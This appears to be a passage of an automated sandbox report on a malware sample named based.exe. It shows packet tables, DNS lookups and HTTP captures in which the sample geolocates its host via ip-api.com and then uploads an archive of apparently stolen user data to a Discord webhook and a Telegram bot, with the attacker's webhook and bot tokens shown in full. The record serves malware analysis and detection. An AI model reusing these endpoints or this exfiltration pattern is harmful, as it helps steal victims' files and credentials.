Aug 2, 2024 00:08:05.968898058 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.969119072 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.969135046 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.969191074 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.969227076 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.969326973 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.969374895 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.969522953 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.969574928 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.969712019 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.969738960 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.969779968 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.969795942 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.969847918 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.969870090 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970026970 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970041037 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970072985 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970091105 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970098972 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970112085 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970154047 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970171928 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970196962 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970211029 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970233917 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970247030 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970268011 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970280886 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970325947 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970360041 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970386028 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970402002 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970436096 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970453978 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970482111 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970498085 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970520973 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970534086 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970572948 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970572948 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970592976 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970612049 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970660925 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970679998 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.970709085 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970746994 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970777035 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970808983 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970844030 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970865011 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970896006 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970930099 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970963955 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.970979929 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.971023083 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.971062899 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.971085072 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.971113920 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.971148014 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.971182108 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.971182108 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.979768038 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.979934931 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.979963064 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:05.980472088 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.980504036 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.980535984 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.980551004 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:05.984945059 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:07.033695936 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:07.033723116 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:07.033817053 CEST	443	49745	149.154.167.220	192.168.2.4
Aug 2, 2024 00:08:07.033819914 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:07.033879042 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:07.034463882 CEST	49745	443	192.168.2.4	149.154.167.220
Aug 2, 2024 00:08:10.468120098 CEST	49742	80	192.168.2.4	208.95.112.1
Aug 2, 2024 00:08:10.473584890 CEST	80	49742	208.95.112.1	192.168.2.4
Aug 2, 2024 00:08:10.473674059 CEST	49742	80	192.168.2.4	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2024 00:08:02.579116106 CEST	54289	53	192.168.2.4	1.1.1.1
Aug 2, 2024 00:08:02.586817980 CEST	53	54289	1.1.1.1	192.168.2.4
Aug 2, 2024 00:08:03.327028990 CEST	58695	53	192.168.2.4	1.1.1.1
Aug 2, 2024 00:08:03.568377972 CEST	53	58695	1.1.1.1	192.168.2.4
Aug 2, 2024 00:08:05.262242079 CEST	57172	53	192.168.2.4	1.1.1.1
Aug 2, 2024 00:08:05.269676924 CEST	53	57172	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 2, 2024 00:08:02.579116106 CEST	192.168.2.4	1.1.1.1	0x8a9d	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:03.327028990 CEST	192.168.2.4	1.1.1.1	0x76ee	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:05.262242079 CEST	192.168.2.4	1.1.1.1	0x6add	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 2, 2024 00:08:02.586817980 CEST	1.1.1.1	192.168.2.4	0x8a9d	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:03.568377972 CEST	1.1.1.1	192.168.2.4	0x76ee	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:03.568377972 CEST	1.1.1.1	192.168.2.4	0x76ee	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:03.568377972 CEST	1.1.1.1	192.168.2.4	0x76ee	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:03.568377972 CEST	1.1.1.1	192.168.2.4	0x76ee	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:03.568377972 CEST	1.1.1.1	192.168.2.4	0x76ee	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Aug 2, 2024 00:08:05.269676924 CEST	1.1.1.1	192.168.2.4	0x6add	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	208.95.112.1	80	6900	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 00:08:02.592679024 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.2
Aug 2, 2024 00:08:03.163827896 CEST	379	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 22:08:02 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	162.159.138.232	443	6900	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-01 22:08:04 UTC	302	OUT	POST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 693785 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=720bf38bf17272696e0e8c38b6636f8d
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 2d 2d 37 32 30 62 66 33 38 62 66 31 37 32 37 32 36 39 36 65 30 65 38 63 33 38 62 36 36 33 36 66 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 39 19 9b 57 21 04 00 00 01 0f 3d 07 9e 02 22 8a 83 18 9c 6e 12 8d b8 4a ec cf 48 aa bc 68 db 08 0b bf 7b cf 99 8c f0 76 b3 e6 c0 83 a1 2e d1 8c a9 54 97 e9 73 a1 ad f3 6e f3 cd 21 bd 88 ab f9 2a ec 72 58 e7 19 d7 cd f7 92 3d 63 5a 0e 32 49 fa 4f cc ab 2a 83 54 89 51 02 37 Data Ascii: --720bf38bf17272696e0e8c38b6636f8dContent-Disposition: form-data; name="file"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!9W!="nJHh{v.Tsn!rX=cZ2IOTQ7
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 37 e3 2a 06 f8 83 d4 32 d4 01 38 97 78 04 ce d0 76 65 97 ea e6 0a aa 55 3c 51 3f e3 7e 57 eb 2c a0 d4 d2 07 86 cc 2e cd e3 c1 69 08 58 e8 ac 52 59 3a 00 5e 3d 89 9b 31 c4 0f e2 66 45 9e 98 a3 10 61 e0 20 9a 64 82 68 98 a7 79 bc e3 63 3b cd d5 22 b0 dc 9e 4d 96 09 46 35 3f 83 a9 ea e5 1f 77 ec 5c 80 0f 59 2a e6 e7 98 d4 05 90 45 49 76 a4 7f 1a 0e 79 0d bb 56 59 32 2c d2 ac 99 e0 41 8a b8 d8 f9 c2 8e 99 c5 4f ef 67 66 9a cb 11 48 42 7e 64 20 52 5d 9c 7a 77 f0 ab b0 67 e3 7c 4f f8 72 03 22 3b 48 b4 57 1e a8 c5 21 fa ae c5 18 47 ed 76 6d 16 4b 7a 36 f5 1c 2e e2 9d 84 7e a5 d8 b1 a2 0a d3 74 0f e4 02 be e0 8d 07 d0 65 b6 60 15 ab 84 b4 ec ef f0 e4 ea 05 3d 90 0d 24 38 fc c1 66 b6 b3 65 01 69 4d d6 a7 4a d6 84 5e 5e cc ae fc 0a d9 22 5d 73 3d 53 14 0a ba bc 7f Data Ascii: 728xveU<Q?~W,.iXRY:^=1fEa dhyc;"MF5?w\YEIvyVY2,AOgfHB~d R]zwg\|Or";HW!GvmKz6.~te`=$8feiMJ^^"]s=S
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 4b 43 0e 58 51 8b b1 de 55 4c df d0 32 d5 98 e3 55 9c 1a 97 3c 45 f8 f4 ae 65 05 82 a8 f3 5f b4 7a 89 21 10 fa 5f 14 4a 4d f4 0c 6c 53 c3 6b c3 91 ff c6 36 eb c0 c5 24 1e 70 7b f8 5f 09 82 fb f9 ee 34 2e 33 a3 58 53 85 8b 96 ac 19 61 ff c1 91 84 12 b6 59 5d 80 c5 de 3f cc 1c 19 b3 5a 1b 89 68 7c 5d 6a 70 4f ec 8d 5c 0e 12 76 a9 5a 3f 55 13 12 60 c2 c7 68 85 71 32 82 cd 2b 6d a9 ec a0 50 86 09 8a ac f3 db 1e 55 8e 1a fa 2a d2 c9 65 80 ef 6b a7 6b e8 4e 4e 9a 6c 47 bf 59 24 94 63 2f 0c 5a b3 87 56 4a 8a 31 96 d2 d2 27 a2 dd 32 8a f3 ec a8 3c 5d d3 40 d4 63 74 8b 88 18 ba 43 fe 99 db 3c 47 8b 0c 34 0c 37 12 04 b9 88 76 ec 17 03 06 ff f9 41 44 a3 88 43 90 e5 e4 c9 57 0c d6 7a 47 e2 28 08 ef 9f c9 41 bb b3 d6 1a 02 24 a8 5f 61 65 e1 00 0e 05 86 40 1f f5 b7 6f Data Ascii: KCXQUL2U<Ee_z!_JMlSk6$p{_4.3XSaY]?Zh\|]jpO\vZ?U`hq2+mPU*ekkNNlGY$c/ZVJ1'2<]@ctC<G47vADCWzG(A$_ae@o
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 46 e7 8f 8e 47 df 67 71 80 66 91 35 1f 85 09 e6 9c f6 5b 91 01 b6 f2 8d 9f 69 2e dd 99 d9 84 fd 1b 33 15 f8 19 51 f8 02 b6 56 41 f5 86 7a ea 09 58 9c f5 4c 81 0b 65 72 40 e3 0b 48 20 6c 5c 8c 05 cd d6 9c cd 77 60 8f 33 13 56 a1 65 f3 ae 4f 46 38 06 08 0d 1a ee d5 93 58 9e 3b b7 1d 8e f5 34 7b 3d 33 f6 35 42 29 f3 aa e3 74 7c b9 61 ad 4d 85 b1 36 29 d1 bd 22 01 3c de 5a 52 64 8d 9a cc 74 e8 c7 68 f3 50 68 e8 a0 72 03 1a 1c 0f 63 45 93 4b 01 15 ca 2e d2 1f 93 19 06 13 71 0e c8 a8 45 4b 44 99 68 c3 7c 32 7c 23 d3 f3 b3 6b 1e 06 ce e2 8b ed f8 41 c2 7d 09 e4 c8 f3 a3 45 de e4 54 e7 73 91 f5 40 ce 94 84 02 1e cb 41 ec 73 f6 7f 8e 12 24 23 94 f1 45 b1 73 60 84 d2 7f 08 c1 36 f8 af 68 4b 72 3a ea 15 5c b8 6e 6a cc e8 6f 8e f1 7a 29 27 1d b4 90 08 e1 4a 3a 25 eb Data Ascii: FGgqf5[i.3QVAzXLer@H l\w`3VeOF8X;4{=35B)t\|aM6)"<ZRdthPhrcEK.qEKDh\|2\|#kA}ETs@As$#Es`6hKr:\njoz)'J:%
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 53 c2 3d 41 9f 65 06 f3 59 ac ac 41 e8 a5 b6 77 23 06 74 be 11 59 82 83 a5 3d 54 a7 af f2 5f 24 58 aa 96 71 76 ee 4b c7 33 a3 e0 e6 3f ae fe f5 be 36 65 02 94 74 42 10 65 a8 d7 3b 3d f2 83 ac 8d a6 62 79 95 f6 b3 04 7a c1 4d e1 7f 27 f1 c6 2b 80 90 b1 b0 87 a3 ce 3a 7e 9e 99 a6 40 e1 71 ce be 4d 1c b4 9a 48 0f c0 97 ef e4 46 b8 2f e1 e0 de f7 0b ee fe bb 72 26 0d 13 03 b4 e9 4b d6 b4 3e d0 a8 58 92 77 ad 5d b4 ee 11 49 88 2e 08 18 c2 2d d3 24 bc 27 38 18 09 87 9d bc f2 94 c8 8e 8f f9 45 f5 91 b4 49 c2 2a d8 09 c1 77 44 7d 4c 43 a6 cf 47 69 cb b9 26 f6 71 ad 34 f4 f3 cb d3 af 45 d4 a3 8e 42 aa 38 c4 0a e9 85 11 d6 08 f5 1a ac 6e c1 aa f8 5e 4b 89 b9 a6 15 76 7e 7b 11 3a c7 8b a3 e4 d7 b1 93 c3 92 56 e3 71 f7 91 8e f8 c4 b2 99 d7 79 04 20 06 17 22 33 5b d6 Data Ascii: S=AeYAw#tY=T_$XqvK3?6etBe;=byzM'+:~@qMHF/r&K>Xw]I.-$'8EI*wD}LCGi&q4EB8n^Kv~{:Vqy "3[
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: cb 2f 13 b2 7f a1 b3 13 d5 52 93 fe 83 51 a5 a1 ba 58 67 02 73 80 24 fa 22 fb f0 66 af d3 c6 76 2a 72 04 bb 69 f5 a5 bb 56 16 94 56 6f 81 dd b1 1b d6 2c 3a 35 29 d8 64 f0 f0 84 fe 99 d4 b4 08 e5 fc e1 6c 06 ba 8e 8d 76 af d8 70 f1 27 5f a5 7d 47 b9 51 c4 8d b5 f6 4e c4 1f 58 45 d1 c1 60 50 1e cd 90 55 34 c7 2e da 23 4a 11 a6 e2 4c b4 9d 5c 15 90 38 03 73 b4 e2 42 4a d4 58 f5 57 db 9b f1 ce 8c ba aa be 0b 75 70 d6 f8 1f ba 8e 09 4f 7a da 05 0f a7 cb 33 43 68 96 39 6d 36 bc de 7c 53 be ce 93 5e d6 e0 76 05 b8 64 1c 25 6c 0a d5 8a 42 77 29 d5 ba c4 88 cf a1 4a d0 fa 8e 2c 65 41 77 7a ad 72 5f 1e 97 48 50 82 fa 76 8a c7 1d 5e 52 15 00 0e 06 27 e0 a7 46 82 1e 38 91 d3 9e f6 5a 51 2d 1b 15 b1 72 8d ff 2d ec 32 4f b9 48 60 43 74 80 98 fe 75 07 81 21 65 5e 06 84 Data Ascii: /RQXgs$"fv*riVVo,:5)dlvp'_}GQNXE`PU4.#JL\8sBJXWupOz3Ch9m6\|S^vd%lBw)J,eAwzr_HPv^R'F8ZQ-r-2OH`Ctu!e^
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 06 21 86 2d b8 ca f1 ea ea d7 b5 71 9e da ff 37 ba 8d 3d be 66 7f ec 60 17 86 c1 55 bc 39 72 2f c3 76 ba b9 0a 92 31 b0 b0 db cf 56 2b 77 ff c5 45 47 36 bf dc 5f 65 5d 56 15 e6 6f 4a 83 14 62 03 5c 17 19 ac 9d dd b7 17 56 4c 9c 8b 8e 4e a1 98 3b a4 59 4a 1e b2 17 8c f4 03 81 d0 d5 42 62 7a 6d f7 79 f2 bf dc 70 74 43 20 e3 49 55 d9 44 46 3c a8 0d 7b 03 f3 12 22 af f7 3d bd dc 20 84 b4 0a 3f 62 2e 0a ce e4 ef 8b 98 89 6a 03 df f3 8f b3 b1 f5 23 1c 6b 80 74 37 9c 50 bc dd 38 93 cf c5 b0 69 d9 52 e4 83 0c 9d 6d 81 d0 93 23 51 53 6d ce e1 6d e9 83 7f 92 09 ec 8f ee 66 83 3f 34 38 e9 52 c8 84 47 73 ac 21 be 35 46 1e 84 50 d9 5e c0 8b ce 55 18 9a ad 20 12 46 dd 6e 68 fd ef a8 b8 0d 5d 27 76 de 58 20 18 4b eb 30 62 01 20 0b 06 2f 7e fa 93 d5 f0 9f 7d 30 9b 92 fc Data Ascii: !-q7=f`U9r/v1V+wEG6_e]VoJb\VLN;YJBbzmyptC IUDF<{"= ?b.j#kt7P8iRm#QSmmf?48RGs!5FP^U Fnh]'vX K0b /~}0
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: cc 07 76 c7 74 9d 2d 25 3d 8f 08 6b a9 31 c1 5e a0 0a 98 a5 cf 66 1c ee 95 47 e1 6e 8b 1c 7e e8 f6 07 09 69 d6 20 78 55 ee 1c b5 0a 6d 1b ee 14 19 90 5c 88 5b e8 8c 92 aa e8 a5 5f 86 f7 c6 39 2f 27 8f b5 fa 79 d8 df 95 a8 f5 ba 1a be 52 b6 c8 ff 38 2f 55 70 d6 ba cf 8b c1 19 6d 2f 86 1e bd 25 52 51 4a 39 34 c4 66 f9 25 72 22 a0 91 ae 75 1d 63 5f 1c ff a1 0f 43 67 1d af 4b 55 10 41 7d c2 09 0f 00 cd 10 4b 61 70 92 fd ca 4d e3 35 f3 36 c7 60 39 6a 8b 71 7e b1 ad 80 6d d2 99 ff 19 30 73 13 f3 1a 22 5d d4 0f 8a 4c cf 86 56 b8 24 29 8d 47 08 36 8a 7f 45 89 38 11 ac 20 3d bb 6c 59 f5 b7 f2 e9 b2 96 e9 0b 4a cf a1 c9 f2 aa 38 64 91 15 05 f7 c8 bc 43 55 b2 c7 af 5e a6 fa ad ad 12 87 7d 92 dd 0c 8d 12 33 a2 c3 26 f7 27 9d f6 03 9c 3d 76 f5 97 31 db 9c 14 76 99 21 Data Ascii: vt-%=k1^fGn~i xUm\[_9/'yR8/Upm/%RQJ94f%r"uc_CgKUA}KapM56`9jq~m0s"]LV$)G6E8 =lYJ8dCU^}3&'=v1v!
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 11 f2 1c cb d8 20 56 a9 01 4c 21 3d e2 26 c9 e0 b7 ef e2 09 c0 42 fe 59 9f 8d 5b 47 4b ad 1c 38 a4 05 c1 96 0e 1d 2b 2a e4 60 a6 ac 88 0c 88 91 ab 4d cf fe cf 7e 9a af 8e ab 07 15 b7 b0 06 70 64 1d fb 9e 1b e9 4f b4 b2 7e 6e 8c 15 cc be 09 c3 2a 97 31 30 53 12 79 8a 14 08 ee 64 d3 10 d2 8f d9 7d 19 07 bd f1 a8 f1 c3 7b 61 83 6f 4f 7e 27 9d a0 81 64 9f 61 66 48 09 6e 08 44 a2 94 a9 7f 35 9c 7d 3e 08 18 46 ce ac 47 71 11 48 e2 38 51 bc d8 3c af 1e 98 3e dd a9 f3 de be 51 02 f1 ff db 11 d3 01 3b b4 a8 15 aa ef b1 62 36 4a 69 59 5f 81 92 63 43 fa fb 89 28 35 c6 ca 10 31 fd 92 b2 53 46 96 2e 3e b3 f0 1f e6 b5 45 e4 80 c0 1d c2 31 ca 2c 60 3b 36 93 60 a7 65 31 56 60 7f a9 92 cf 7f b0 02 9e 1d 56 8f 17 34 52 5e d4 e4 a6 b4 40 ea 14 a1 d1 7f 7e 2f 4a 4c 17 c2 f6 Data Ascii: VL!=&BY[GK8+`M~pdO~n10Syd}{aoO~'dafHnD5}>FGqH8Q<>Q;b6JiY_cC(51SF.>E1,`;6`e1V`V4R^@~/JL
2024-08-01 22:08:04 UTC	16384	OUT	Data Raw: 38 78 b3 a1 2b bd bc f3 ca 6a f7 e1 e6 dd bf 66 da 6b ac bc 1c 5e 44 71 0d 87 80 a6 e5 c4 2c ed 4d 3e 3b 10 39 45 d1 42 86 fe e9 64 96 5d a9 17 fb 29 4c 07 33 a5 64 8b 9f 18 68 06 bc 40 51 d0 0c f7 e6 4b fd 7e 14 73 15 66 52 63 a2 a7 18 31 e5 27 34 e6 c9 db 22 53 b8 97 20 fa 77 d2 ad b8 89 9a fc 80 6b 76 91 c5 f9 a4 a5 f9 04 4e 81 54 1d 49 1f b7 e0 97 69 7d 77 2f ae 10 cf a7 03 db 0c 48 4a 4d cb e7 b5 70 59 3f 86 99 7f 62 8b ba 86 e8 77 b7 38 8d 23 07 fa 9b 46 d0 78 e5 48 a5 60 53 9a 7e 60 91 ee 9c 29 c0 95 96 d4 80 61 96 7d d0 80 86 0d 08 b4 ea f7 e9 63 e4 32 9a f5 ed d4 97 21 46 2e 73 25 5f e0 bf 32 e1 95 5b a3 4b 42 c5 4e 0b 41 a2 62 08 d9 78 0f 70 f3 04 1a 6f 7a dc ab ba 80 5b e4 56 2f 93 83 62 ea e9 12 b7 69 16 5e 21 34 8e 87 8c a8 c6 72 38 17 64 03 Data Ascii: 8x+jfk^Dq,M>;9EBd])L3dh@QK~sfRc1'4"S wkvNTIi}w/HJMpY?bw8#FxH`S~`)a}c2!F.s%_2[KBNAbxpoz[V/bi^!4r8d
2024-08-01 22:08:04 UTC	1363	IN	HTTP/1.1 404 Not Found Date: Thu, 01 Aug 2024 22:08:04 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=86a67c90505211efa91f02a2205ccffc; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1722550086 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CBDsglSGZFtmEeHZSaZpu0gKvclv57NsKn2ouq5Wvr%2BKbHhBPUdkKEAjfq36xufpoUjuGflx4Jvyl4mSQSjQ0AG3EvGLr1mEG3nt1AYH%2BJeKO6517B2wOimkuVI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=86a67c90505211efa91f02a2205ccffc9478c4367cc9c36b457f84c079b54cecf5426fcf88478aa68b98437576e030a4; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=b3a25f467d6e14d2f5864b2062409193ec70586a-1722550084; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49745	149.154.167.220	443	6900	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-01 22:08:05 UTC	268	OUT	POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 693625 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=70a0ee6004635fcdc0eadbf20538b64a
